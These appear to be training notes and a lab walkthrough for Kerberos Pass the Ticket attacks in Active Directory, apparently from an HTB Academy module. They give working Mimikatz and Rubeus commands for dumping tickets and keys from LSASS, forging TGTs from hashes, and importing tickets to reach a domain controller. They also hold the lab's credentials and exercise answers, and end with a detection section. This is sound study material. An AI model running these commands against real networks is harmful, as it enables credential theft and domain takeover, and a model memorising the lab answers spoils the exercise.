Pass the Ticket (PtT) Attacks

🎯 Overview

Pass the Ticket (PtT) is a lateral movement technique in Active Directory environments that uses stolen Kerberos tickets instead of NTLM password hashes. Unlike Pass the Hash attacks, PtT leverages the Kerberos authentication protocol to impersonate users and access resources.

Key Concepts

• TGT (Ticket Granting Ticket) - First ticket obtained, used to request additional service tickets

• TGS (Ticket Granting Service) - Service-specific tickets that allow access to particular resources

• KDC (Key Distribution Center) - Domain Controller component that issues tickets

• LSASS Process - Windows service that processes and stores Kerberos tickets

---

🔧 Kerberos Protocol Refresher

Authentication Flow

1. User → KDC: Authentication Request (encrypted timestamp with password hash)
2. KDC → User: TGT (if authentication successful)
3. User → KDC: TGS Request (presents TGT)
4. KDC → User: TGS for specific service
5. User → Service: Present TGS for authentication

Ticket Types

• Service Ticket (TGS) - Access to specific resource/service

• Ticket Granting Ticket (TGT) - Used to request service tickets for any accessible resource

Advantage: User doesn't need to provide password to every service - tickets handle authentication

---

🎯 Attack Prerequisites

Required Conditions

• Local Administrator privileges (to access LSASS)

• Valid Kerberos tickets on target system

• Domain-joined Windows machine

• LSASS access for ticket extraction

Ticket Sources

1. Currently logged-in users (active sessions)

2. Cached tickets from previous authentications

3. Forged tickets using extracted keys

4. Exported .kirbi files from previous operations

---

🛠️ Harvesting Kerberos Tickets

1. Mimikatz Ticket Export

Export All Tickets to .kirbi Files

# Launch Mimikatz with debug privileges
mimikatz.exe
privilege::debug

# Export all tickets to current directory
sekurlsa::tickets /export

# Results in .kirbi files like:
# [0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi
# [0;3e7]-0-2-40a50000-DC01$@cifs-DC01.inlanefreight.htb.kirbi

Ticket Naming Convention

# User tickets
[randomvalue]-username@service-domain.local.kirbi

# Computer account tickets (end with $)
[randomvalue]-computername$@service-domain.local.kirbi

# TGT tickets (krbtgt service)
[randomvalue]-username@krbtgt-domain.local.kirbi

2. Rubeus Ticket Export

Dump All Tickets (Base64 Format)

# Export all tickets as Base64 (easier copy-paste)
Rubeus.exe dump /nowrap

# Output includes:
ServiceName          :  krbtgt/inlanefreight.htb
UserName             :  plaintext
Base64EncodedTicket  :  doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA...

Note: Rubeus exports tickets in Base64 format instead of files, preventing disk artifacts.

3. Extract Kerberos Encryption Keys

Mimikatz Key Extraction

mimikatz.exe
privilege::debug

# Extract all Kerberos encryption keys
sekurlsa::ekeys

# Results show multiple key types:
aes256_hmac       b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60
rc4_hmac_nt       3f74aa8f08f712f09cd5177b5c1ce50f
rc4_hmac_old      3f74aa8f08f712f09cd5177b5c1ce50f

Key Types Explained:

• aes256_hmac - Modern AES-256 encryption (preferred)

• rc4_hmac_nt - Legacy RC4/NTLM hash

• rc4_hmac_old - Older RC4 implementation

---

🔄 Pass the Key (OverPass the Hash)

Concept

Pass the Key (aka OverPass the Hash) converts a user's hash/key into a full Ticket Granting Ticket (TGT). This technique bridges hash-based and ticket-based attacks.

1. Mimikatz OverPass the Hash

Using NTLM Hash

mimikatz.exe
privilege::debug

# Create new process with injected TGT
sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f

# Results:
# - New cmd.exe window opens
# - TGT injected into new process
# - Can request any service tickets for user

Process Details

user    : plaintext
domain  : inlanefreight.htb  
program : cmd.exe
NTLM    : 3f74aa8f08f712f09cd5177b5c1ce50f
PID     : 1128
LUID    : 0 ; 3414364 (00000000:0034195c)

2. Rubeus OverPass the Hash

Using AES256 Key (Preferred)

# Request TGT using AES256 key
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap

# Using RC4/NTLM hash
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /nowrap

Key Advantages

• No admin privileges required (unlike Mimikatz)

• Base64 output for easy manipulation

• Multiple encryption types supported

• Stealth operation - no new processes

Security Note: Using RC4 instead of AES256 may trigger "encryption downgrade" detection in modern domains.

---

🎫 Pass the Ticket (PtT) Attacks

1. Rubeus Pass the Ticket

Direct Ticket Import with /ptt

# Request TGT and immediately import to current session
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt

# Result: "Ticket successfully imported!"

Import .kirbi File

# Import ticket from file
Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi

# Verify access
dir \\DC01.inlanefreight.htb\c$

Import Base64 Ticket

# Convert .kirbi to Base64 (PowerShell)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("ticket.kirbi"))

# Import Base64 ticket
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA...

2. Mimikatz Pass the Ticket

Import .kirbi File

mimikatz.exe
privilege::debug

# Import ticket into current session
kerberos::ptt "C:\path\to\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"

# Result: * File: 'ticket.kirbi': OK

# Test access
dir \\DC01.inlanefreight.htb\c$

Launch New CMD with Ticket

# Import ticket and launch new command prompt
kerberos::ptt "ticket.kirbi"
misc::cmd

# New cmd.exe window opens with imported ticket

---

🔌 PowerShell Remoting with PtT

Prerequisites

• Remote Management Users group membership OR

• Administrative privileges on target OR

• Explicit PowerShell Remoting permissions

Default Ports:

• TCP/5985 - HTTP

• TCP/5986 - HTTPS

1. Mimikatz + PowerShell Remoting

Method 1: Sequential Import

# Step 1: Import ticket with Mimikatz
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
exit

# Step 2: Launch PowerShell and connect
powershell
Enter-PSSession -ComputerName DC01

# Result: Remote session as imported user
[DC01]: PS C:\Users\john\Documents> whoami
inlanefreight\john

2. Rubeus + Sacrificial Process

Create LOGON_TYPE 9 Process

# Create sacrificial process (prevents TGT erasure)
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

# Results:
[+] Process         : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 1556
[+] LUID            : 0xe07648

Request TGT in New Process

# From new cmd window, request and import TGT
Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt

# Launch PowerShell and connect
powershell
Enter-PSSession -ComputerName DC01

[DC01]: PS C:\Users\john\Documents> whoami
inlanefreight\john

---

🎯 HTB Academy Lab Exercises

Lab Environment

• Target: 10.129.164.157 (ACADEMY-PWATTACKS-LM-MS01)

• Credentials: Administrator : AnotherC0mpl3xP4$$

• Domain: inlanefreight.htb

• DC: DC01.inlanefreight.htb

Exercise 1: Ticket Collection

Question: "Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users TGT did you collect?"

# RDP to target machine  
xfreerdp /v:10.129.164.157 /u:Administrator /p:'AnotherC0mpl3xP4$$'

# One-line Mimikatz export command
C:\tools\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

# List all .kirbi files
dir

# Expected .kirbi files (example):
[0;3e4]-2-0-60a10000-MS01$@krbtgt-INLANEFREIGHT.HTB.kirbi    (computer account)
[0;3e4]-2-1-40e10000-MS01$@krbtgt-INLANEFREIGHT.HTB.kirbi    (computer account)
[0;45828]-2-0-40e10000-julio@krbtgt-INLANEFREIGHT.HTB.kirbi  (USER TGT)
[0;461ec]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi   (USER TGT)
[0;46eb9]-2-0-40e10000-david@krbtgt-INLANEFREIGHT.HTB.kirbi  (USER TGT)

# Count only USER TGTs (exclude computer accounts ending with $)

Answer: 3 user TGTs (julio, john, david)

Exercise 2: John's Share Access

Question: "Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john"

# Import john's TGT with Mimikatz
C:\tools\mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\Administrator\[0;461ec]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
exit

# Access john's shared folder
dir \\DC01.inlanefreight.htb\john

# Read the flag
type \\DC01.inlanefreight.htb\john\john.txt

Expected Output:

Directory of \\DC01.inlanefreight.htb\john
07/14/2022  07:25 AM    <DIR>          .
07/14/2022  07:25 AM    <DIR>          ..
07/14/2022  03:54 PM                30 john.txt
               1 File(s)             30 bytes

Exercise 3: PowerShell Remoting

Question: "Use john's TGT to perform a Pass the Ticket attack and connect to the DC01 using PowerShell Remoting. Read the flag from C:\john\john.txt"

# Navigate to tools directory
cd C:\tools

# Import john's TGT with Mimikatz
mimikatz.exe
kerberos::ptt C:\tools\[0;461ec]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi
exit

# Launch PowerShell from same Command Prompt
powershell

# Connect via PowerShell Remoting
Enter-PSSession -ComputerName DC01

# Read flag file
cat C:\john\john.txt

Expected Session:

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\tools> Enter-PSSession -ComputerName DC01
[DC01]: PS C:\Users\john\Documents> cat C:\john\john.txt
[FLAG_CONTENT]

Key Lab Insights

Ticket Identification Patterns

# Computer account tickets (ignore for user count)
*MS01$@krbtgt-INLANEFREIGHT.HTB.kirbi

# User TGT tickets (count these)
*julio@krbtgt-INLANEFREIGHT.HTB.kirbi
*john@krbtgt-INLANEFREIGHT.HTB.kirbi  
*david@krbtgt-INLANEFREIGHT.HTB.kirbi

Critical Command Sequence

1. Export: mimikatz "privilege::debug" "sekurlsa::tickets /export" exit
2. Import: kerberos::ptt "[ticket-path]"
3. Test: dir \\DC01.inlanefreight.htb\[username]
4. Remote: Enter-PSSession -ComputerName DC01

Success Indicators

• Exercise 1: Count = 3 (julio, john, david)

• Exercise 2: Successful SMB share access to john folder

• Exercise 3: Remote PowerShell session established as john

Optional: Tool Comparison

Objective: Perform attacks using both Mimikatz and Rubeus independently

Mimikatz-Only Approach:

# Export tickets
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

# Import and test
mimikatz.exe "privilege::debug" "kerberos::ptt ticket.kirbi" "exit"

Rubeus-Only Approach:

# Dump tickets
Rubeus.exe dump /nowrap

# Import and test  
Rubeus.exe ptt /ticket:base64_ticket_data

---

🛡️ Detection and Defense

Detection Indicators

# Event Log Monitoring
# Event ID 4768 - TGT Request
# Event ID 4769 - TGS Request  
# Event ID 4624 - Logon with unusual characteristics

# Unusual ticket requests:
- RC4 encryption in AES-enabled domain
- Tickets requested outside normal hours
- Multiple TGT requests for same user
- Cross-domain ticket requests

Defensive Measures

# Account Security
✅ Implement least privilege access
✅ Regular password rotation for service accounts
✅ Monitor privileged account usage

# Kerberos Hardening
✅ Enforce AES encryption only
✅ Reduce ticket lifetime
✅ Enable Kerberos logging
✅ Monitor for downgrade attacks

# Network Monitoring
✅ Monitor Kerberos traffic (port 88)
✅ Detect unusual authentication patterns
✅ Implement honeypot accounts

---

🔗 Related Techniques

Comparison Matrix

Technique	Auth Method	Requirements	Stealth Level
Pass the Hash	NTLM	Admin + Hash	Medium
Pass the Ticket	Kerberos	Valid Ticket	High
Pass the Key	Kerberos	Key/Hash	High
Golden Ticket	Kerberos	krbtgt Hash	Very High
Silver Ticket	Kerberos	Service Hash	Very High

Lateral Movement Chain

1. Initial Access → Credential Dumping
2. Extract NTLM Hash → Pass the Hash
3. Extract Kerberos Keys → Pass the Key  
4. Generate TGT → Pass the Ticket
5. Access Target Resources → Further Exploitation

---

📚 References

• HTB Academy: Password Attacks Module - Pass the Ticket

• Mimikatz Documentation: Kerberos attacks and ticket manipulation

• Rubeus Documentation: .NET tool for Kerberos abuse

• Microsoft: Kerberos Authentication Technical Reference

• NIST: Guidelines for Kerberos implementations